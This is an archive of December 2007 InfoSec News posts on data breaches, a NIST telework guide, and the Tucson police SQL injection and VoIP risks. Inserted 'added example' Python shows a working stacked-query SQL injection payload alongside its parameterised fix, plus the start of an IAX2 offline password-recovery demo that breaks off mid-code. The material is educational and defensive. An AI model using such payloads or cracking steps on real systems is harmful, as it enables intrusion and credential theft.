try to crack into someone else's online banking or e-mail accounts. You'd be surprised the number of times you'd be successful." Sell Online allows business owners to set up online stores for products, provide shipping quotes, and enable customers to use virtual shopping carts. Many mail-order businesses link their websites with the Sell Online website to automatically calculate shipping costs and determine packaging dimensions.
Karin Bull, owner of Biopaw, a Pickering, Ont.-based mail-order business dealing in natural pet food, recently opened an account with Sell Online. Ms. Bull said she was "devastated" when contacted by the Globe and Mail and presented with her passwords that were gleaned from the Internet. "These are passwords I use for other online applications like e-mail and banking," Ms. Bull said. "I'm definitely going to think twice about repeated attempts to login anywhere online again." Scott Smith, president of NoFenders.com, a Simcoe, Ont.-based Formula One Racing merchandise retailer, said he couldn't believe his username and password were already online, especially since he had created his shipping profile only last Thursday. "That's pretty scary," he said. "You really could ruin someone's business by logging in and changing all their shipping numbers." The Canada Post security breach comes just two weeks after a massive privacy flaw was discovered on the website of another federal agency. In late November, a Huntsville, Ont., man was able to access social insurance numbers, birthdates and driver's licence numbers of those applying for new passports on the Passport Canada website. "Unfortunately, this kind of thing happens all the time," said Ian Goldberg, an Internet security expert at the University of Waterloo. In the case of Sell Online, it appears that a folder with client login attempts was inadvertently placed in a public area of the Web server, Prof. Goldberg said. "This is clearly not malicious," he said. "Canada Post isn't a security company, it's a post office. They just made a mistake." 
From alerts at infosecnews.org Tue Dec 18 00:02:45 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] ITL Bulletin for December 2007 Message-ID: Forwarded from: Elizabeth Lennon ITL BULLETIN FOR DECEMBER 2007 SECURING EXTERNAL COMPUTERS AND OTHER DEVICES USED BY TELEWORKERS Shirley Radack, Editor Computer Security Division Information Technology Laboratory National Institute of Standards and Technology U.S. Department of Commerce Many workers highly value the arrangements that they have with their employers to work from home or from other locations away from their organizations' facilities. This popular practice of teleworking, or telecommuting, benefits both the organizations and their staff members, who are able to read and send email, access Web sites, review and edit documents, and perform many other tasks from remote sites. These teleworkers use devices such as desktop and laptop computers, personal digital assistants (PDAs), and cell phones to access their organization's nonpublic computing resources and to conduct business from them when they are at home or traveling. For many years, teleworkers were limited in their activities because their dial-up modems, which were the primary communications mechanism for remote access, operated at slow speeds. Today high-speed Internet connectivity and broadband communications provide fast data transfer rates, greatly expanding the productive use of remote access capabilities by teleworkers. But with increasing intruder attacks and other threats in today's computing environment, teleworkers and their organizations are challenged to plan carefully to protect the security of telework devices, networks, and information resources. 
User's Guide to Securing External Devices for Telework and Remote Access The Information Technology Laboratory of the National Institute of Standards and Technology (NIST) has issued a new guide that provides practical advice to help workers secure their external devices that they need for teleworking. NIST Special Publication (SP) 800-114, User's Guide to Securing External Devices for Telework and Remote Access: Recommendations of the National Institute of Standards and Technology, written by Karen Scarfone and Murugiah Souppaya, focuses on the security of the teleworker's computing devices and recommends steps to protect the devices, the computer operating systems (OSs) and applications, and the home networks that the computers use. The guide provides an overview of telework technologies and the security issues related to the use of telework devices. The basic issues of securing information and home networks, and of using external networks, are discussed. Recommendations to users cover protecting their devices, computer operating systems and applications, and for protecting the information stored on telework computers and removable media. Advice is provided for protecting the wireless home networks that are used for remote access communications. A section of NIST SP 800-114 focuses on protecting cell phones, PDAs, and smart phones, such as hybrid cell phone/PDA devices (for example, BlackBerry and Windows Mobile devices). Another section guides teleworkers in the safe use of devices that are secured by a third party, such as a computer provided for public use at a conference or hotel. 
The publication's useful appendices present supplemental information and supporting material, including security-related considerations for telework, such as using cellular phones and Voice over Internet Protocol (VoIP) phone services; using wireless personal area network (WPAN) technologies such as Bluetooth; using wireless broadband data cards; and ensuring the secure destruction of removable media and printed materials that might contain sensitive information. Also included in the appendices are a glossary, a list of acronyms and abbreviations, and a list of in-print resources and online tools and resources that users may wish to consult for additional information about securing their telework devices. NIST SP 800-114 is available at NIST's Web site at http://csrc.nist.gov/publications/nistpubs/800-114/SP800-114.pdf. Security of Telework Devices: A Challenge for Workers and Their Organizations Both personal computers and consumer devices are used for telework, and different ownership arrangements apply to the devices. Personal computers (PCs) are desktop and laptop computers that run standard PC OSs (e.g., Windows, Linux/UNIX, Mac OS). These devices gain access to broadband networks through cable modems, digital subscriber lines, satellite, and wireless connections. Consumer devices are small, usually mobile, computers that do not run standard PC OSs. Examples are networking-capable PDAs, cell phones, and video game systems. Consumer devices are most often used for remote access applications that use Web browsers, primarily Secure Sockets Layer (SSL) Virtual Private Networks (VPNs) and individual Web application access. Telework devices may be owned, configured, and managed by the worker's organization and can be used for any of the organization's access methods. Some teleworker devices are owned by the worker, who is responsible for securing them and maintaining their security. 
Another arrangement is the devices that are owned, configured, and secured by third parties, such as kiosk computers at hotels, and PCs or consumer devices owned by friends and family of the worker. Remote access options for third party-secured devices are usually limited because users are often unable to install software onto them, such as VPN software, terminal server software, and Web browser plug-ins. Because of their security policies and technology limitations, organizations often limit the types of devices that can be used for remote access. An organization might require the worker to use only the organization's PCs. Some organizations have tiered access levels, such as allowing the organization's PCs to access many resources, teleworker-owned PCs to access a more limited set of resources, and consumer devices and third-party PCs to access only one or two resources, such as Web-based email. This allows an organization to limit the risk it incurs by permitting the most controlled devices to have the most access and the least controlled devices to have minimal access. Before they use their own or third-party computers for remote access to their organization's resources, teleworkers should check to confirm that the organization's latest policies allow such access. There are risks associated with remote access to information resources in general, and broadband communications, if not properly protected, can be especially vulnerable to intruder attacks. When a telework device uses remote access, it is essentially a logical extension of the organization's own network. Therefore, if the telework device is not secured properly, it poses additional risk not only to the information that the teleworker accesses but also to the organization's other systems and networks. For example, a telework device infected with a worm could spread the worm through remote access to the organization's internal computers. 
Therefore, telework devices should be secured properly and have their security maintained regularly. Many organizations automatically check the security health of each telework device that attempts to use remote access to the organization's information resources to ensure that the device complies with the organization's policies. Examples of the checks that an organization might conduct are verifying that the OS is fully patched, that antivirus software is installed and up-to-date, and that a personal firewall is enabled. The organization can also check if the device has been secured by the organization and whether the device is a desktop or laptop computer, a PDA, a video game system, or other device. Based on the results of these checks, the organization can determine whether the device should be permitted to use remote access. With good planning and careful implementation of sensible guidelines, organizations can support the popular practice of telecommuting, while protecting their networks and information resources. Threats to External Devices People who want to cause mischief, disrupt organizational operations, and commit fraud are a major threat to the security of external devices used by teleworkers. Telework devices are susceptible to the insertion of malware, also known as malicious code. Malware is a computer program that is covertly placed onto a computing device with the intent of compromising the confidentiality, integrity, or availability of the device's data, applications, or OS. Common types of malware threats include viruses, worms, malicious mobile code, Trojan horses, rootkits, and spyware. Malware threats can infect devices through email, Web sites, file downloads and file sharing, peer-to-peer software, and instant messaging. Another common threat for telework devices is the loss or theft of the device. Someone with physical access to a device has many options for attempting to view the information stored on it. 
Teleworkers can increase the security of their devices by adopting security protections, or security controls. These measures taken against the threats compensate for the device's security weaknesses, or vulnerabilities. Some vulnerabilities can be eliminated through security protections. For example, the user can enable a feature in an application to automatically download and install new versions of the application to correct previous errors. Some vulnerabilities cannot be eliminated, but security protections can prevent attacks. For example, antivirus software can stop an infected email from being opened by a user, or hard drive encryption can make files unreadable by others. However, not all vulnerabilities can be eliminated. The complexity of computing and remote access makes total protection of information resources almost impossible. But organizations can realize a more realistic goal of applying security protections to give attackers as few opportunities as feasible to gain access to a device or to damage the device's software or information. NIST Recommendations Teleworkers should take an important first step before implementing any of the recommendations or suggestions in the guide. They should back up all of their data and verify the validity of the backups. Users with limited experience in configuring personal computers, consumer devices, or home networks should seek expert assistance in applying the guide's recommendations to avoid any potential losses of data, device, or application functionality. NIST recommends that teleworkers take the following steps to improve and maintain the security of their external telework devices: * Become thoroughly familiar with their organization's policies and requirements, and know how to protect the organization's information that they may access. Sensitive information that is stored on or sent to or from external telework devices must be protected. 
It is important to prevent malicious parties from accessing or altering information. An unauthorized release of sensitive information could damage the public's trust in the organization, jeopardize the mission of the organization, or harm the individuals whose personal information is compromised. Many methods can be employed to protect the personal information that is accessed during teleworking, including protecting the physical security of telework devices, encrypting files stored on devices, and ensuring that information stored on devices is backed up. * Ensure that all the telework devices used on wired and wireless home networks are properly secured, and that home networks are protected also. Appropriate security measures should be applied to the PCs and consumer devices that use the same wired and wireless home networks to which the telework device normally connects. If these other devices become infected with malware or are otherwise compromised, they could attack the telework device or eavesdrop on its communications. Teleworkers should also be cautious about allowing others to place devices on the teleworkers' home networks, in case one of these devices is compromised. Teleworkers should also apply security measures to the home networks to which their telework devices normally connect. One example of such a security measure is to use a broadband router or firewall appliance to prevent computers outside the home network from initiating communications with telework devices on the home network. Another example is to ensure that sensitive information transmitted over a wireless home network is adequately protected through strong encryption. * Secure the operating systems and primary applications of desktop or laptop PCs that the teleworker owns and uses for telework. 
Securing a telework PC includes the following actions: -- Use a combination of security software, such as antivirus and antispyware software, personal firewalls, spam and Web content filtering, and popup blocking, to stop most attacks, particularly malware. -- Restrict who can use the PC by having a separate standard user account for each person; assign a password to each user account; use the standard user accounts for daily use; and protect user sessions from unauthorized physical access. -- Ensure that updates are regularly applied to the operating system and primary applications, such as Web browsers, email clients, instant messaging clients, and security software. -- Disable unneeded networking features on the PC and configure wireless networking securely. -- Configure primary applications to filter content and stop other activity that is likely to be malicious. -- Install and use only known and trusted software. -- Configure remote access software based on the organization's requirements and recommendations. -- Maintain the security of the PC on an ongoing basis, such as changing passwords regularly and checking the status of security software periodically. * Secure the consumer devices that the teleworker owns and uses for telework, based on the security recommendations of the devices' manufacturers. A wide variety of consumer devices exists, and security features available for these devices also vary widely. While some devices offer only a few basic features, others offer sophisticated features similar to those offered by PCs. Devices with less sophisticated features are not necessarily less secure than those with many more security features. Many devices offer more security features because the capabilities that they provide, such as access to wireless networking and capabilities for instant messaging, make them more susceptible to attack than devices without these capabilities. 
General recommendations for securing telework devices are: -- Limit access to the device, such as setting a personal identification number (PIN) or password and automatically locking a device after an idle period. -- Disable networking capabilities, such as Bluetooth, except when they are needed. -- Use additional security software, such as antivirus software and personal firewalls, if appropriate. -- Ensure that security updates, if available, are acquired and installed at least monthly, preferably weekly. -- Configure applications to support security, such as blocking activity that is likely to be malicious. * Consider the security state of a third-party device before using it for telework. Teleworkers often want to perform remote access to their organization's network from third-party devices. They may want to check their email from a kiosk computer at a conference, for example. However, they may not know if such devices have been secured properly or if they have been compromised. Consequently, a teleworker could use a third-party device infected with malware that steals information from users (e.g., passwords or email messages). Many organizations either forbid third-party devices to be used for remote access or permit only limited use, such as for Web-based email. Teleworkers should consider who is responsible for securing a third-party device and who can access the device before deciding whether or not to use it. Whenever possible, teleworkers should not use publicly accessible third-party devices for telework, and teleworkers should avoid using any third-party devices for performing sensitive functions or accessing sensitive information. More Information NIST SP 800-114 was originally issued for public comment as an update to NIST SP 800-46, Security for Telecommuting and Broadband Communications. However, as the scope of NIST SP 800-114 evolved, NIST decided to issue it as a supplement to SP 800-46, rather than as a replacement. 
NIST SP 800-114, NIST SP 800-46 and other NIST publications assist organizations in planning and implementing a comprehensive approach to information security. For information about NIST standards and guidelines that are referenced in the security guide for teleworker devices, as well as other security-related publications, see NIST's Web page at http://csrc.nist.gov/publications/index.html. For information about standards and guidance for protecting information, communications, and operations through the application of cryptographic security techniques, see http://csrc.nist.gov/groups/ST/toolkit/index.html. Many manufacturers document their security recommendations in their product documentation or on their Web sites. Some manufacturers also make security checklists available for securing their operating systems, applications, and devices. Many of these checklists are posted on the NIST Security Checklists for IT Products site, located at http://csrc.nist.gov/checklists/. Disclaimer Any mention of commercial products or reference to commercial organizations is for information only; it does not imply recommendation or endorsement by NIST nor does it imply that the products mentioned are necessarily the best available for the purpose. Elizabeth B. Lennon Writer/Editor Information Technology Laboratory National Institute of Standards and Technology 100 Bureau Drive, Stop 8900 Gaithersburg, MD 20899-8900 Telephone (301) 975-2832 Fax (301) 975-2378 From alerts at infosecnews.org Tue Dec 18 00:03:03 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] 'Sensitive' security data is lost Message-ID: http://www.telegraph.co.uk/news/main.jhtml?view=DETAILS&grid=&xml=/news/2007/12/17/npols517.xml By James Kirkup The Telegraph 17/12/2007 Electronic details of the new security system protecting Parliament have been lost, sparking a Commons security alert. 
The Daily Telegraph understands that a laptop containing sensitive information about the new Westminster access system disappeared last Wednesday night. The computer belonged to a senior parliamentary official believed to work in the Serjeant at Arms department responsible for the security of MPs and the Palace of Westminster. Compounding the embarrassment of the security officials, the laptop is said to have been stolen within the parliamentary estate. "It is password protected, but there is stuff on there about access control, so it is sensitive," said a parliamentary official. "It is not the sort of stuff you want floating around out there." A spokesman for the House of Commons declined to comment on the missing laptop, insisting that the parliamentary authorities never discussed security issues. Security at Parliament has been radically stepped up since two groups - Fathers 4 Justice and pro-hunting campaigners - breached Commons security in 2004. Security officials say the greatest fears surround the possibility that terrorists could obtain a Westminster security pass and gain access to some of the most sensitive locations in the UK. From the New Year, a new, enhanced security pass system is being introduced that is meant to render a stolen pass useless. From alerts at infosecnews.org Tue Dec 18 00:03:23 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Insurer gets record fine for ID theft disaster Message-ID: http://www.techworld.com/security/news/index.cfm?newsID=10952 By John E. Dunn Techworld 17 December 2007 A UK insurance house has been slapped with a record fine by the Financial Services Authority (FSA) watchdog for incompetent customer account security. The latest offender is Norwich Union, which allowed fraudsters to impersonate customers when phoning its call centres, cashing in policies on an astonishing 74 occasions out of a total of recorded 632 attempts. 
The criminals (11 suspects have now been arrested) were able to steal a total of £3.3 million during the scam, which took place in 2006. The FSA has hit the company with a £1.26 million ($2.6 million) fine, a record for the UK, and even larger than that levied on the Nationwide Building Society earlier this year for losing a laptop full of unspecified customer data in August 2006. Norwich Union only avoided an even larger fine of £1.8 million ($3.6 million) by promptly settling the charges with the industry regulator and agreeing to tighten up its procedures. One of the most serious charges was that the company failed to react to the pattern of fraud, allegedly initially only informing customers who had been or were current directors of the company. In other words, the company realised fraud was happening but was unable to put in place extra security to stop further occurrences. "Norwich Union Life let down its customers by not taking reasonable steps to keep their personal and financial information safe and secure," said the FSA's Margaret Cole. "It is vital that firms have robust systems and controls in place to make sure that customers' details do not fall into the wrong hands. Firms must also frequently review their controls to tackle the growing threat of identity theft. This fine is a clear message that the FSA takes information security seriously and requires that firms do so too," she added. Norwich Union for its part claims to have tightened up its procedures, which appear to have been compromised by the ease with which criminals were able to use data taken from a variety of public sources to impersonate policy holders. "We are sorry that this situation arose and apologised to the affected customers when this happened," Mark Hodges, Norwich Union Life chief, was reported to have said.
"We have extensive procedures in place to protect our customers but in this instance weaknesses were exploited and we were the target of organised fraud," he said using a degree of understatement. The Norwich Union since has refunded stolen money and reinstated the hacked policies. From alerts at infosecnews.org Tue Dec 18 00:04:19 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Students charged with hacking JCPS computer system Message-ID: http://www.wave3.com/Global/story.asp?S=7509176 By Scott Harvey WAVE 3 TV December 17, 2007 Louisville - Two local high school students and a former student are in trouble after authorities say they hacked into the school's computer system. It happened back in October at Manual High School. In a story you will read only on wave3.com, Investigator Scott Harvey explains the students were doing more than just changing grades. School officials say they were smart kids, doing smart things. "We are trying to determine how they did it," said Cary Petersen, JCPS's executive director of Information Technology. "What was the damage they did? And trying to correct everything as quickly as possible. The two seniors and one former student could face some stiff penalties for breaking into the JCPS computer system. School officials tell WAVE 3 News they don't know how long the students had been altering grades and attendance records, but eventually that's what got them caught. "The attendance clerk at the school noticed what she had put in from one day was missing from the next," Petersen said. School officials say they didn't stop with just the illegal extra credit. "They created their own website," Petersen explained. He said the alleged hackers also broke into individual teacher's computers and created a website -- www.ilovekeepers.com. The site is named after Manual's principal, Dr. Beverly Keepers. 
Officials say the group posted tests and quizzes, along with the answers that went with them. We checked the website. Now when you log on it simply says, "If you are looking for the infamous site everyone is talking about -- sorry. Check back later for more appropriate content." Petersen also told me the students worked at a computer parts store, which gave them access to equipment that students don't normally have. "We believe there was a device that was put on the system itself," he explained. "It allowed them to get in the door. Once they got in the door, it was ollie ollie oxen free. They could go anywhere they wanted to." But school officials don't have the answer they really want -- why they did it. "I think it was, for more or less, for show," Petersen said. "You know, 'look what I can do.'" According to the JCPS Code of Conduct, the students have been suspended with a recommendation for alternative placement. If the school decides to press charges and if convicted, school officials say the students could face jail time. Petersen says the students are now working with school computer technicians to help improve the website's security. All content Copyright 2000 - 2007 WorldNow and WAVE From alerts at infosecnews.org Wed Dec 19 00:27:03 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Police Web site back after hacker hits media database Message-ID: http://www.tucsoncitizen.com/daily/local/71839.php By Renee Schafer Horton Tucson Citizen 12.18.2007 The Tucson Police Department's Web site will be coming back online within the next 48 hours, Pat Johnson, TPD webmaster, said. The Web site went down about two weeks ago after a man calling himself "Hmei7" hacked into it, Johnson said. There was no danger to police data files during this time, Johnson explained, because Hmei7 hit only the media release database. Johnson said Hmei7 is from Indonesia and has hacked into hundreds of government Web sites internationally. 
He said Hmei7 doesn't qualify as a professional hacker, because he doesn't seek to do permanent damage to a site, but rather cause a nuisance. "I'd call him a professional prankster," Johnson said. Using a technique called "SQL injection," which is pronounced "sequel injection," Hmei7 got into the TPD media release site and programmed a change into the search box. "On our media site, we have a search box for the media releases," Johnson said. "SQL injection allows someone to type 'Mr. Jones' and a SQL statement and that changed all the titles of all the media releases to read, 'Hmei7 has touched your soul.' " TPD was notified of the problem by someone trying to view the Web site, and TPD immediately shut the site down, Johnson said. Hmei7 was able to insert the SQL injection code by getting past the city of Tucson firewall and the TPD firewalls, Johnson said. Sgt. Mark Robinson said TPD information technology has been working the past two weeks to identify how Hmei7 gained access and to install security measures to prevent SQL injections from being used again. From alerts at infosecnews.org Wed Dec 19 00:27:14 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] Students charged with hacking JCPS computer system Message-ID: Forwarded from: Jason Scott Wow, this one takes me back. It harkens back to a top quality 1983-era "holy crap, the children are coming at us like technozombies" sensational piece worthy of a weekly. On Tue, 18 Dec 2007, InfoSec News wrote: > http://www.wave3.com/Global/story.asp?S=7509176 > > By Scott Harvey > WAVE 3 TV > December 17, 2007 > > Louisville - Two local high school students and a former student are > in trouble after authorities say they hacked into the school's > computer system. It happened back in October at Manual High School. In > a story you will read only on wave3.com, Investigator Scott Harvey > explains the students were doing more than just changing grades. 
> > School officials say they were smart kids, doing smart things. From alerts at infosecnews.org Wed Dec 19 00:27:29 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:50 2008 Subject: [ISN] TJX, banks reach settlement in data breach Message-ID: http://www.boston.com/business/articles/2007/12/18/tjx_banks_reach_settlement_in_data_breach/ By Ross Kerber Globe Staff December 18, 2007 TJX Cos. and New England banks said today they have agreed to settle a high-profile lawsuit over payment card security practices in the wake of the record-setting data breach at the Framingham retailer that compromised as many as 100 million accounts. TJX, the parent of discount retail chains including T.J. Maxx and Marshalls, will pay community banks and trade groups in Massachusetts, Connecticut, and Maine a portion of their legal expenses. More specifics weren't disclosed, but the deal won't add to the $256 million in total spending TJX previously had budgeted to deal with the breach, a spokeswoman said today. In addition to settling with the banks, the figure is meant to cover previous settlements with payment card company Visa International Inc. for up to $40.9 million in costs, and with a class of consumers. TJX still faces claims from an Alabama bank and investigations by federal and state officials over the breach. But Mary Monahan, partner of Javelin Strategy & Research in California, said the deal amounts to a relative win for TJX and one that was no surprise after a decision by a federal district court judge made it harder for the banks to join together to sue TJX as a class. "Once that happened, it became too expensive for the banks to continue on this route," she said. Both sides said they were pleased with the outcome. Banks led by the Massachusetts Bankers Association had filed their suit in the spring as the extent of the data breach became clear, seeking to cover costs such as reissuing compromised cards. 
TJX found illicit software on its systems at the end of last year, and Canadian privacy officials later tied the intrusion to a weakness in the company's wireless security systems dating back as far as 2005. Although officials have won convictions against individuals in Florida and elsewhere for misusing the stolen card numbers to buy goods, to date no individual has been charged with the intrusion itself. The bankers alleged that TJX was negligent in not maintaining stricter data security, and unearthed various documents that showed the company wasn't meeting industry security standards and had caused Visa to issue fines. TJX had fought back, however, arguing its security was similar to other retailers and noting that only recently have a majority of large merchants met payment card security rules. As part of today's deal, the bankers are recommending their members accept the repayments Visa is offering under the terms of its deal with TJX. In statements today both sides said they hope the deal will improve overall security. "The TJX experience underscores broader challenges facing the US payment card system that require urgent action," said Carol Meyrowitz, TJX chief executive, in a statement. Daniel Forte, president of the Massachusetts Bankers Association, said the case was worth pursuing to show weaknesses in the payment system. "This data breach and the ensuing litigation have clearly initiated an important nationwide dialogue on the importance of improving the security of the US payment card system," he said. Copyright 2007 Globe Newspaper Company.
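The SQL injection described in the Tucson Police Department item above (a search term that is spliced into the query and rewrites every media-release title) is easy to reproduce in miniature. The block below is an added example, not code from the Tucson Citizen story or from TPD: sqlite3 stands in for the real database, the table rows and the payload are constructed here, and `run_stacked()` is a stand-in for a driver that executes several `;`-separated statements in one call (sqlite3's own `execute()` refuses to, so the split is done by hand). The vulnerable search is shown beside the parameterised one that closes the hole.

```python
"""Added example (not code from the Tucson Citizen story or from TPD): a media-release
search box that splices the search term into SQL, the single request that rewrites every
title through it, and the parameterised query that closes the hole. sqlite3 stands in
for the real database; table contents and the payload are constructed here."""
import sqlite3

# Constructed sample rows standing in for a media-release table.
RELEASES = [
    ("Robbery suspect arrested", "2007-11-30"),
    ("Holiday DUI enforcement", "2007-12-01"),
    ("Mr. Jones honoured for service", "2007-12-02"),
]

# Constructed payload: closes the LIKE literal, stacks an UPDATE, and ends with an
# opening quote so the template's trailing "%'" still parses as a string.
PAYLOAD = ("x%' OR 1=1; UPDATE releases SET title = 'Hmei7 has touched your soul' "
           "WHERE 1=1 OR '")


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE releases (id INTEGER PRIMARY KEY, title TEXT, released TEXT)")
    conn.executemany("INSERT INTO releases (title, released) VALUES (?, ?)", RELEASES)
    conn.commit()
    return conn


def run_stacked(conn, sql):
    """Stand-in for a driver that executes every ';'-separated statement it is handed.
    sqlite3's execute() refuses more than one statement, so the split is done here.
    Returns the rows of the first statement, which is what a search page expects."""
    rows = None
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if not stmt:
            continue
        cur = conn.execute(stmt)
        if rows is None:
            rows = cur.fetchall()
    conn.commit()
    return rows or []


def search_vulnerable(conn, term):
    """The bug: the term becomes SQL text, so quotes and semicolons in it are code."""
    sql = "SELECT title FROM releases WHERE title LIKE '%" + term + "%'"
    return [row[0] for row in run_stacked(conn, sql)]


def search_safe(conn, term):
    """The fix: the term is bound as a value. '%' and '_' in it are at most wildcards,
    never statements. Running the search under a read-only database account as well
    means a future injection bug still cannot UPDATE anything."""
    cur = conn.execute("SELECT title FROM releases WHERE title LIKE ?", ("%" + term + "%",))
    return [row[0] for row in cur.fetchall()]


def all_titles(conn):
    return [row[0] for row in conn.execute("SELECT title FROM releases ORDER BY id")]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable search returned:", search_vulnerable(db, PAYLOAD))
    print("titles afterwards:", all_titles(db))
    db = make_db()
    print("safe search returned:", search_safe(db, PAYLOAD))
    print("titles afterwards:", all_titles(db))
```

Run as a script, the vulnerable path returns every title (the `OR 1=1`) and leaves all three rows reading "Hmei7 has touched your soul"; the parameterised path returns nothing for the same input and the rows are untouched. Firewalls, which the article mentions twice, are irrelevant here: the payload arrives as an ordinary HTTP request on the port the firewall has to allow.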
From alerts at infosecnews.org Wed Dec 19 00:27:42 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] Data breach officials could be sent to the big house Message-ID: http://www.theregister.co.uk/2007/12/18/hmrc_crim_penalties/ By Joe Fay The Register 18th December 2007 Civil servants responsible for the loss of public data could face prison sentences in future, instead of a brief period in sackcloth and ashes before being shifted into a consultancy role. In his update on the HMRC data loss to MPs yesterday, Alistair Darling said: "There will now also be new sanctions under the Data Protection Act for the most serious breaches of its principles. "These will take account of the need not only to provide high levels of data security but also to ensure that sensible data sharing practices can be conducted with legal certainty. We will consult early in the New Year on how this can best be done." The Times reports that ministers have accepted that the penalties for "gross failures" to protect citizens' details should include criminal penalties. These could be as harsh as a two year prison sentence for the most serious offenses. Darling, yesterday, also said that spot check powers introduced in Whitehall in the wake of the HMRC data loss would be extended right across the public sector. In the wake of the recent HMRC debacle, the head of department resigned, but swiftly reappeared doing work for the cabinet office. Meanwhile, the government pointed the finger at a junior official they said had ignored procedures to download the data onto a disk. It subsequently emerged that senior officials had been involved in the decision to just plonk the entire benefits database onto a couple of CDs before popping it into the internal mail. This weekend it emerged that the exact procedures for protecting data were only detailed in a manual that was restricted to senior civil servants. 
Of course, the issue is not whether the penalties are introduced, but whether they are enforced and used. Plausible deniability is a Whitehall watchword and there's nothing more plausible than denying all knowledge and/or blaming outside contractors. Except perhaps ensuring that the relevant watchdogs are fed a paltry and bromide-heavy diet. Information Commissioner Richard Thomas was presumably looking to head off just such a situation yesterday when, as well as expressing his "welcome" for the Chancellor's plans, he declared: "It goes without saying that it is essential that the ICO is properly resourced to discharge any new responsibilities effectively." The Foundation for Information Policy Research was less positive, saying that Darling's response, and that of Ruth Kelly on the loss of three million driving test candidate IDs, showed the government still didn't understand the nature of the problem. "Their refusal to abandon the headlong rush towards Transformational Government - the enormous centralised databases being built to regulate every walk of life - is not just pig-headed but profoundly mistaken," it said. "Before Transformational Government came along, only small amounts of data were lost - but as the new databases cover the whole population, everyone's affected now, not just a few unlucky people," it continued. Ross Anderson, chair of FIPR and Professor of Security Engineering at the University of Cambridge, called instead for localised databases, to limit the damage from any leaks. "You can have security, or functionality, or scale - you can even have any two of these. But you can't have all three, and the Government will eventually be forced to admit this. In the meantime, billions of pounds are being wasted on gigantic systems projects that usually don't work, and that place citizens' privacy and safety at risk when they do," he said.
Oh, and the BBC reports that details of 6,500 people belonging to a pension firm have been lost at an HMRC office in Wales. The data includes names, addresses, NI numbers, and pension details. From alerts at infosecnews.org Wed Dec 19 00:27:54 2007 From: alerts at infosecnews.org (InfoSec News) Date: Thu Apr 10 04:02:51 2008 Subject: [ISN] VoIP vulnerabilities increasing, but not exploits Message-ID: http://www.networkworld.com/news/2007/121707-crystal-ball-voip-vulnerabilities.html By Tim Greene Network World 12/17/07 The threats against VoIP are numerous and seem to be growing, but in 2008 the technology probably won't suffer crippling attacks. The potential danger is very real. VoIP is susceptible to the many exploits that networks generally are heir to -- denial of service, buffer overflows and more. VoIP PBXs are servers on corporate networks and are only as secure as the networks themselves. In addition, there are many voice-specific attacks and threats. These have been chronicled by researchers and vendors intending to alert users and suggest ways to guard against them. For instance, two protocols widely used in VoIP -- H.323 and Inter Asterisk eXchange -- have been shown to be vulnerable to sniffing during authentication, which can reveal passwords that later can be used to compromise the voice network. Implementations of Session Initiation Protocol (SIP), an alternative VoIP protocol, can leave VoIP networks open to unauthorized transport of data. In addition, tools that can help find vulnerable deployments have been published online by VoIPSA, an industry group dedicated to securing VoIP. The VoIPSA tools are intended to help businesses test and secure their networks, but these and other online tools can be used to probe for weaknesses as well. Still, there have been few exploits so far and none that have been widespread or crippling to businesses. "We are not hearing about attacks.
We don't think they are happening," says Lawrence Orans, an analyst with Gartner. Part of the reason may be that the largest VoIP vendors use proprietary protocols, such as Cisco's Skinny, Nortel's Unistim and Avaya's variant of H.323, Orans says. That makes them difficult to obtain and study for potential security cracks. "These systems are not readily available to the bad guys," he says. SIP, which is gaining popularity, is a mixed bag, Orans says, because it is readily available to those who might want to exploit it. "I would say that SIP is a good-news, bad-news story. It's easy to get your hands on, and that includes the bad guys. The good news is there are more options to protect SIP," he says. These options include firewalls and intrusion-prevention systems that support SIP. Another reason for the lack of broad exploits is that there isn't enough ROI for attackers' development time. Attackers' motivation may improve, however, as VoIP increases in popularity, something it is doing relentlessly. Hybrid PBX systems -- which handle both VoIP and TDM voice -- account for 64% of all PBX lines sold, according to a December 2007 Infonetics report. Pure IP systems account for another 18%. Meanwhile, not everybody agrees with the assessment that VoIP will not suffer a major hit in 2008. "VoIP is, in essence, a time bomb, poised for a massive exploit," says Paul Simmonds, a member of the management board of the Jericho Forum, a user group promoting new principles for secure networking. All contents copyright 1995-2007 Network World, Inc.
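The article says that sniffing an Inter-Asterisk eXchange (IAX) authentication can reveal passwords without saying why. The block below is an added example, not from the Network World piece or from any VoIPSA tool, that shows the two reasons in working code. IAX2 (RFC 5456) offers a PLAINTEXT method, in which the secret is carried in the AUTHREP frame as it is, and an MD5 method, in which the caller answers a numeric challenge with MD5(challenge || secret); whoever captures the AUTHREQ and AUTHREP frames can test candidate secrets offline at hashing speed. Frame layout, frame types and information-element numbers follow RFC 5456; the capture, the secret and the wordlist are constructed here, and `recover_secret()` is this example's own name.

```python
"""Added example, not from the Network World article or from any VoIPSA tool: why a
sniffed IAX2 authentication exchange can give up the password. Frame layout and IE
numbers follow RFC 5456; the capture, secret and wordlist are constructed here."""
import hashlib
import struct

IAX_FRAME_TYPE = 6              # full-frame type: IAX control
AUTHREQ, AUTHREP = 8, 9         # IAX control subclasses (challenge, answer)
IE_PASSWORD, IE_AUTHMETHODS, IE_CHALLENGE, IE_MD5_RESULT = 0x08, 0x0E, 0x0F, 0x10
AUTH_PLAINTEXT, AUTH_MD5 = 0x0001, 0x0002


def iax2_md5_result(challenge, secret):
    """MD5 RESULT as an IAX2 peer computes it: hex MD5 of challenge followed by secret."""
    return hashlib.md5((challenge + secret).encode()).hexdigest()


def build_full_frame(src_call, dst_call, subclass, ies):
    """12-byte full-frame header (F bit set on the source call number) followed by
    type/length/value information elements. Timestamp and sequence numbers are zeroed;
    they play no part in this demonstration."""
    body = b"".join(struct.pack("!BB", t, len(v)) + v for t, v in ies)
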